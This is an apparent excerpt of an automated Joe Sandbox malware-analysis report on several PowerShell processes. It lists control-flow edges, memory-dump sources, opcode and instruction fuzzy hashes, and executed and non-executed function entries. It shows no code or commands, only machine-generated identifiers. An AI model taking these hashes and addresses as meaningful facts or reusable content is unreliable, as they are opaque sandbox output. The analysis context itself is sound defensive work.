7ffd348a9605-7ffd348a9616 call 7ffd348a7748 261->264 265 7ffd348a961b-7ffd348a9627 261->265 262->261 264->265 267 7ffd348a996d-7ffd348a9979 265->267 268 7ffd348a962d-7ffd348a9683 265->268 269 7ffd348a997b-7ffd348a9987 267->269 270 7ffd348a99d0-7ffd348a99dc 267->270 289 7ffd348a98a7-7ffd348a98b3 268->289 290 7ffd348a9689-7ffd348a969b 268->290 269->270 271 7ffd348a9989-7ffd348a99cb call 7ffd348a66b8 call 7ffd348a66b0 call 7ffd348a7750 269->271 273 7ffd348a99de-7ffd348a99ea 270->273 274 7ffd348a9a33-7ffd348a9a3e 270->274 271->270 273->274 278 7ffd348a99ec-7ffd348a9a2e call 7ffd348a66b8 call 7ffd348a66b0 call 7ffd348a7750 273->278 275 7ffd348a9a40-7ffd348a9a4c call 7ffd348a7578 274->275 276 7ffd348a9a51-7ffd348a9a5d 274->276 275->276 280 7ffd348a9b49-7ffd348a9b54 276->280 281 7ffd348a9a63-7ffd348a9abf 276->281 278->274 285 7ffd348a9b56-7ffd348a9b5d call 7ffd348a7768 280->285 286 7ffd348a9b62-7ffd348a9b75 280->286 322 7ffd348a9b23-7ffd348a9b44 call 7ffd348a7698 281->322 323 7ffd348a9ac1-7ffd348a9af4 281->323 285->286 293 7ffd348a9b77-7ffd348a9b85 286->293 294 7ffd348a9ba0-7ffd348a9bac 286->294 289->267 299 7ffd348a98b9-7ffd348a98ca 289->299 297 7ffd348a9855-7ffd348a98a2 call 7ffd348a7540 290->297 298 7ffd348a96a1-7ffd348a96ae 290->298 302 7ffd348a9b87 293->302 303 7ffd348a9b91-7ffd348a9b9b call 7ffd348a75a8 293->303 309 7ffd348a9ce5-7ffd348a9cf1 294->309 310 7ffd348a9bb2-7ffd348a9c0d 294->310 297->289 305 7ffd348a96b4-7ffd348a9759 298->305 306 7ffd348a9822-7ffd348a982c 298->306 307 7ffd348a98fb-7ffd348a994d call 7ffd348a7540 299->307 308 7ffd348a98cc-7ffd348a98e3 299->308 302->303 303->294 332 7ffd348a982e-7ffd348a9832 306->332 333 7ffd348a9834-7ffd348a9835 306->333 307->267 308->307 313 7ffd348a9d2d-7ffd348a9d38 309->313 314 7ffd348a9cf3-7ffd348a9cff 309->314 346 7ffd348a9dcc 310->346 347 7ffd348a9c13-7ffd348a9c27 310->347 320 7ffd348a9f30-7ffd348a9f3b 313->320 321 7ffd348a9d3e-7ffd348a9d49 313->321 314->313 319 7ffd348a9d01-7ffd348a9d28 call 7ffd348a7770 314->319 319->313 330 7ffd348a9f49-7ffd348a9f6d call 7ffd348a7558 320->330 331 7ffd348a9f3d-7ffd348a9f44 call 7ffd348a7728 320->331 321->320 329 7ffd348a9d4f-7ffd348a9d95 call 7ffd348a7728 call 7ffd348a75f0 321->329 322->280 323->322 400 7ffd348a9d97-7ffd348a9dbc call 7ffd348a75f0 329->400 401 7ffd348a9dbe-7ffd348a9dca call 7ffd348a75e0 329->401 357 7ffd348a9f6f-7ffd348a9f72 330->357 358 7ffd348a9fde-7ffd348a9fec 330->358 331->330 342 7ffd348a9838-7ffd348a984f 332->342 333->342 342->297 342->298 361 7ffd348a9dd1-7ffd348a9dd2 346->361 353 7ffd348a9c8b-7ffd348a9ce0 call 7ffd348a75b8 347->353 354 7ffd348a9c29-7ffd348a9c5c 347->354 353->309 354->353 363 7ffd348a9fee-7ffd348aa002 357->363 364 7ffd348a9f74 357->364 358->363 366 7ffd348a9ddd-7ffd348a9e01 call 7ffd348a66d8 call 7ffd348a75c8 361->366 367 7ffd348a9dd8 call 7ffd348a75f0 361->367 370 7ffd348a9f76 364->370 371 7ffd348a9efb-7ffd348a9f09 call 7ffd348a7558 364->371 388 7ffd348a9e03-7ffd348a9e0f call 7ffd348a7738 366->388 389 7ffd348a9e14-7ffd348a9e23 call 7ffd348a75c8 366->389 367->366 377 7ffd348a9f7a-7ffd348a9f82 370->377 371->377 385 7ffd348a9f0b-7ffd348a9f0f 371->385 386 7ffd348a9f90-7ffd348a9f98 377->386 385->386 391 7ffd348a9f11-7ffd348a9f18 385->391 386->252 388->252 408 7ffd348a9e25-7ffd348a9e34 call 7ffd348a75c8 389->408 409 7ffd348a9e3a-7ffd348a9ee0 call 7ffd348a7650 call 7ffd348a5b28 call 7ffd348a5b30 call 7ffd348a7730 389->409 397 7ffd348a9f1a-7ffd348a9f1f 391->397 398 7ffd348a9f94-7ffd348a9f98 391->398 403 7ffd348a9fa0-7ffd348a9fb2 397->403 404 7ffd348a9f21-7ffd348a9f2e 397->404 398->252 400->361 400->401 401->366 404->252 408->409 419 7ffd348a9ee5-7ffd348a9ef8 408->419 409->252 419->371
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bae797817806e5ddbf83e5f2e9f53b7da1551e1df3895fca0758429bf98d74c4
                                              • Instruction ID: 1f0bfa729a0e2b490574f4fbbfcdc89316767903dac59e2dd05f51c7993d1f94
                                              • Opcode Fuzzy Hash: bae797817806e5ddbf83e5f2e9f53b7da1551e1df3895fca0758429bf98d74c4
                                              • Instruction Fuzzy Hash: C1826330B1DA498FEB94EB18C8A57A973E1FF59300F1445B9D50EC7292CE79AC42DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348AE1D0 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 724090e5fe83be020fb20cdb94a4dc0d262740ee853d9db81fe772e35f0ae78c
                                              • Instruction ID: 944dc27409e75a39a30bbaad8038e8514deffdb4bbcb501a3af2ddb961423103
                                              • Opcode Fuzzy Hash: 724090e5fe83be020fb20cdb94a4dc0d262740ee853d9db81fe772e35f0ae78c
                                              • Instruction Fuzzy Hash: F7512B32F0DA494FEBA9DB6C94A52B97BE0EF56314F04057FD14DC3182DEAC68068791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348AE0E9 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID: Interface_ProxyQueryUnknown_
                                              • String ID:
                                              • API String ID: 2522245112-0
                                              • Opcode ID: 22d3f5e948b7a3962439f4acc4cb30465e544568a89bdb5a1e44eb20c044d3b9
                                              • Instruction ID: facc1e4fc3f7c71c6692e007886a2be20fe25b2fcd0c9034060ec479d32b5c38
                                              • Opcode Fuzzy Hash: 22d3f5e948b7a3962439f4acc4cb30465e544568a89bdb5a1e44eb20c044d3b9
                                              • Instruction Fuzzy Hash: 2931393091DB884FD725AB6C9C5A5B67FF4EF57321F04017FE089C3152DA646446C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34975A68 Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2248417915.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd34970000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af29e6bef4b82ca843feddf62706b1fc900885ac0bc9d5479b8ebe51dbd0dfb6
                                              • Instruction ID: 9f09743077b3b59203d151a6af889292c390835dab60012a36f63979607502ee
                                              • Opcode Fuzzy Hash: af29e6bef4b82ca843feddf62706b1fc900885ac0bc9d5479b8ebe51dbd0dfb6
                                              • Instruction Fuzzy Hash: 3EE01A30A18F064BE674ABB8542A6D676D0BB05330F140768E0BED32D6DA38A8428780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00007FFD348A5EF2 Relevance: 2.2, Strings: 1, Instructions: 1000COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M_^
                                              • API String ID: 0-3807191693
                                              • Opcode ID: 0cea559471f8dd9102125b1fbeb9c259724fcac1db9de14fcab4fc84a484a372
                                              • Instruction ID: 8640a0659bedab39805fe7084069462d1f4eb8d09be032897f2e1ad5f386e14c
                                              • Opcode Fuzzy Hash: 0cea559471f8dd9102125b1fbeb9c259724fcac1db9de14fcab4fc84a484a372
                                              • Instruction Fuzzy Hash: C442C717B0D16517E32177FDB9B61FA7B64CF42339B0C53B7D2CC9A093AC68244A82A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348B609D Relevance: 2.0, Strings: 1, Instructions: 743COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: L_^
                                              • API String ID: 0-3811526842
                                              • Opcode ID: 479097a3addf2f9db5d20a0b9c2570e0c0794c64883a0bab83b95c7845aee984
                                              • Instruction ID: 87f7ee96eb656470d6add54546704052e8679f4bde232c449f1fdd581c67152b
                                              • Opcode Fuzzy Hash: 479097a3addf2f9db5d20a0b9c2570e0c0794c64883a0bab83b95c7845aee984
                                              • Instruction Fuzzy Hash: D9F15346B0E7D21FE752576C58B60E93FA0DF53265B0D01FBC688DA0A3ED5D280B9293
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348B4CFB Relevance: 1.8, Strings: 1, Instructions: 570COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 2edc63450ce86645cbb9073ed37c38039b2372416535a5970c2100e6e25032e6
                                              • Instruction ID: 59042b553e0cb41ef209f80f8ca0e9245217594be79a56e138308942c6f0a5d2
                                              • Opcode Fuzzy Hash: 2edc63450ce86645cbb9073ed37c38039b2372416535a5970c2100e6e25032e6
                                              • Instruction Fuzzy Hash: 3912B213A0D7D21FD353577868B61E53FA0EF53265B0901FBC6C4CB0A3E95D280A93A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348B172D Relevance: 1.8, Strings: 1, Instructions: 542COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;,M
                                              • API String ID: 0-842882436
                                              • Opcode ID: 73c6c0402bd8fe98b1e1e58299504d96a85170b5dde4a47c170909fdee1a81b7
                                              • Instruction ID: 7fa4d3227624d20ecc63937f99cda45d0bf68a8e97dba4867bedd2a9828e117f
                                              • Opcode Fuzzy Hash: 73c6c0402bd8fe98b1e1e58299504d96a85170b5dde4a47c170909fdee1a81b7
                                              • Instruction Fuzzy Hash: AFF1B127B0D29A5BD31177FCB8B50EA7B64DF42379B0C53B7D1C88E093AC6834468695
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348A44F8 Relevance: .7, Instructions: 737COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3bf04d33204b05152876f4b7bf31edb979e7988cf422401184a719c8b94f0ac1
                                              • Instruction ID: 9e837638f552766ae4f6165f2d457769adc920af732c1e6935ed9bda8073e547
                                              • Opcode Fuzzy Hash: 3bf04d33204b05152876f4b7bf31edb979e7988cf422401184a719c8b94f0ac1
                                              • Instruction Fuzzy Hash: B912F743B0FAD50BE75167FC78B50F96B94DF8377570C42F7D188CA0879CA8A84A82A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348A2098 Relevance: .6, Instructions: 620COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: edfddcd339ef46ae38ba174e68c7102ca0a9386becd426aadf209139982e2b21
                                              • Instruction ID: 59edbf4ee646617d1c95d5b557a1668971309a7f1180351bc8f1eaf22de438d7
                                              • Opcode Fuzzy Hash: edfddcd339ef46ae38ba174e68c7102ca0a9386becd426aadf209139982e2b21
                                              • Instruction Fuzzy Hash: 1612BD63B0F7D24FE36397A868B50E57FA0EF5326470900F7C2C4CB193E958680A9762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348B75FA Relevance: .3, Instructions: 287COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b01c631cdcb7eef9119a087f636ba6e166deae0207ecfda4374c2de1aa8a628f
                                              • Instruction ID: 2396be5fe77ecb0481562f347a01a25c606abee2532c256aa34149ba69fb4622
                                              • Opcode Fuzzy Hash: b01c631cdcb7eef9119a087f636ba6e166deae0207ecfda4374c2de1aa8a628f
                                              • Instruction Fuzzy Hash: 62713047B0E7921FD257566DA8F61FA3B50DEA327570900B7C785CB293EC4D080BA6E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              Function 00007FFD3489587B Relevance: .6, Instructions: 606COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2312739290.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d76dadf9ce095833f536b7bfe661cb9e3e59416b543006ac94634e4b44939a09
                                              • Instruction ID: 7206970a8c680937cece52a6cb1a506af2d8834622edc1b0dfcea8e2b209b492
                                              • Opcode Fuzzy Hash: d76dadf9ce095833f536b7bfe661cb9e3e59416b543006ac94634e4b44939a09
                                              • Instruction Fuzzy Hash: 0612E632B09A498FDF94DB5CC4A5AE97BE1FF6A310F14017AD449D7292CA38EC42C781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34894FED Relevance: .4, Instructions: 448COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2312739290.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c1dee48690d723847fa0cb3d48f03229ca86ad68387e28a05de3b5132e39225
                                              • Instruction ID: 4154b0e43b2f542f5c07146e5864285dd83967e2617a8b7445539ff4b1c72b45
                                              • Opcode Fuzzy Hash: 4c1dee48690d723847fa0cb3d48f03229ca86ad68387e28a05de3b5132e39225
                                              • Instruction Fuzzy Hash: A5E1B231A08A498FDF95EF9CC4A5AED7BE1FF5A314F14416AD409D7286DA38E841CBC0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34965375 Relevance: .4, Instructions: 378COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2313383634.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e02a60571c21cea413e23d58730537919d465dff1a7e6c626872933cb6515c47
                                              • Instruction ID: 5ba41c730b50aec0bf9f7daf56adacc2273756fb8143666b7f373074815b2110
                                              • Opcode Fuzzy Hash: e02a60571c21cea413e23d58730537919d465dff1a7e6c626872933cb6515c47
                                              • Instruction Fuzzy Hash: 3EC12322B0EA850FE7A5AB6868A51787BD2FF96230B1801BED04DC71D7DD2DB806C351
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34960E8D Relevance: .3, Instructions: 304COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2313383634.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e28522c74a3afdd0e4a6165119da48b6493d20b8ff6285ead9ff49f7bb0b7fc3
                                              • Instruction ID: 0fa3b4b3cb5494d399d47a0684b43d81f0abc5c00e319ebf7dd7ce012b923704
                                              • Opcode Fuzzy Hash: e28522c74a3afdd0e4a6165119da48b6493d20b8ff6285ead9ff49f7bb0b7fc3
                                              • Instruction Fuzzy Hash: 92A1F332B0DA854FEBA5DA6888A517877E1FF96230B1841BED09CC71C7DE2DA806C741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34962012 Relevance: .2, Instructions: 244COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2313383634.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0abf17546f786655e0667a1c4b22596d470027f3ae1a136bcfb2338679e65449
                                              • Instruction ID: 8423852e31a5a3c380eacf0ff63db44f960619b35c7052a06ea91ff1c7544c99
                                              • Opcode Fuzzy Hash: 0abf17546f786655e0667a1c4b22596d470027f3ae1a136bcfb2338679e65449
                                              • Instruction Fuzzy Hash: DB810522A0EBC54FD753AB7858A45A57FA0EF53224B0900FFD188CF0E7C91C9949C762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD3496127E Relevance: .2, Instructions: 193COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2313383634.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fba12845bfc4fa473aa88fea04a72326bf46b1dabe9193f8e7a908cc3e9c014a
                                              • Instruction ID: a30d0885b0065605fb9b2c43e0b9eb173c2865063ebb6d706230966cd71cdbb3
                                              • Opcode Fuzzy Hash: fba12845bfc4fa473aa88fea04a72326bf46b1dabe9193f8e7a908cc3e9c014a
                                              • Instruction Fuzzy Hash: 1851D13150D7C94FD7568B6898626A57FF0EF57321B0942EFD089C7193CA686806C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34896F65 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2312739290.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b49edf286071e7bd412aadf92f77269161cd96206bd6cf13fce3c2756922ee7
                                              • Instruction ID: 0d0412f950b30b451f06dc64bf2bfa9a2a07b21c8b59f064aa6ab84361b8d54b
                                              • Opcode Fuzzy Hash: 3b49edf286071e7bd412aadf92f77269161cd96206bd6cf13fce3c2756922ee7
                                              • Instruction Fuzzy Hash: 1231FF30A18A498FDF98EF98C4A5EAD7BE1FF69304F540169E40DD3395CA35E881CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34896B92 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2312739290.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf38c5bd7a3321e7d7fac4087cf901b6bf9674a47bbe15cb457b2d535ed1e256
                                              • Instruction ID: be379e7e13be4affcde647064d2d7ba9e5a4227fc4aec52287b555573c17d408
                                              • Opcode Fuzzy Hash: cf38c5bd7a3321e7d7fac4087cf901b6bf9674a47bbe15cb457b2d535ed1e256
                                              • Instruction Fuzzy Hash: EC218772A1CB448FDB54DF5CD8925997BF1FB99324F14015EE08A97292D631F842CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD348933B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2312739290.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d5f8bd4930a63cdbcd6f9a23957c342ff1d62f78ef99ce6612c7dcee371064b
                                              • Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
                                              • Opcode Fuzzy Hash: 0d5f8bd4930a63cdbcd6f9a23957c342ff1d62f78ef99ce6612c7dcee371064b
                                              • Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              Function 00007FFD349635E5 Relevance: 1.7, Instructions: 1713COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2628505203.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca2b2533267587ee32c491adfa81ed0230b9f7a1a99d93fe53fdb1537d0d53bc
                                              • Instruction ID: ef91bbef832107f4fa0546836b68406e516c8ce3cd0535e4662323112c058eac
                                              • Opcode Fuzzy Hash: ca2b2533267587ee32c491adfa81ed0230b9f7a1a99d93fe53fdb1537d0d53bc
                                              • Instruction Fuzzy Hash: FDB22521B0DB890FE7A6972858B51B53BE1EF9B230B0801FFD589C71A7DD1DAC068361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD3489505F Relevance: 1.6, Strings: 1, Instructions: 359COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2626989558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: O\_H
                                              • API String ID: 0-3266431130
                                              • Opcode ID: 09870fd836d35518633410e855db38165bdfb4a080d89cae6dbf5d2d11cb6ca2
                                              • Instruction ID: a035f3ac2f1032c1e8e33f5997ed7c95564cdb1114908281425e16063d32b6a7
                                              • Opcode Fuzzy Hash: 09870fd836d35518633410e855db38165bdfb4a080d89cae6dbf5d2d11cb6ca2
                                              • Instruction Fuzzy Hash: 1BC15F31A09A4D8FDF98EF5CC4A5AED7BE1FFA9304F14416AD409D7295CA34E881CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD349614C6 Relevance: .6, Instructions: 568COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2628505203.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e7e8fe24dd04ed607f59fd6b138cf6f21db7c77d503aff3cb2a7074f617a1e7
                                              • Instruction ID: d095993949599154dd216a85748b9aa58617d2013eb02fc6b2ede92a008b72bd
                                              • Opcode Fuzzy Hash: 0e7e8fe24dd04ed607f59fd6b138cf6f21db7c77d503aff3cb2a7074f617a1e7
                                              • Instruction Fuzzy Hash: 61F11621A0EBC90FD756DB6898A56A57FE1EF97220B0801FFD18DCB193DA1DAC06C351
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34961A84 Relevance: .3, Instructions: 253COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2628505203.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c8195f34ca85de191869d7725ca13da0e8972e0f229d55c1458fe28b463f73e4
                                              • Instruction ID: 95fcdaba58acea526895ec38cb4e400cd1fcf44a5299c8726c7a31a9d5c85b68
                                              • Opcode Fuzzy Hash: c8195f34ca85de191869d7725ca13da0e8972e0f229d55c1458fe28b463f73e4
                                              • Instruction Fuzzy Hash: 54712B23B0DA860FE7A99A7814B217477D2EF96330B5801BEC19DC72DBEE1DE8058351
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34961AF4 Relevance: .2, Instructions: 151COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2628505203.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_7ffd34960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59894c0357d636a03e0d66e73c1946d72b69cc6eaf282998c325637e54ee4b61
                                              • Instruction ID: ed961f8a15662a2dcb6de669353f6ffa815f7feaee1963e43afd9e292346da69
                                              • Opcode Fuzzy Hash: 59894c0357d636a03e0d66e73c1946d72b69cc6eaf282998c325637e54ee4b61
                                              • Instruction Fuzzy Hash: 66413513F0EA860FE3A99A7818B6178A6C1EF56330B5C01BED19DC72DBED1DAC059311
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD34962400 Relevance: .1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.2628505203.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                              Joe Sandbox IDA Plugin
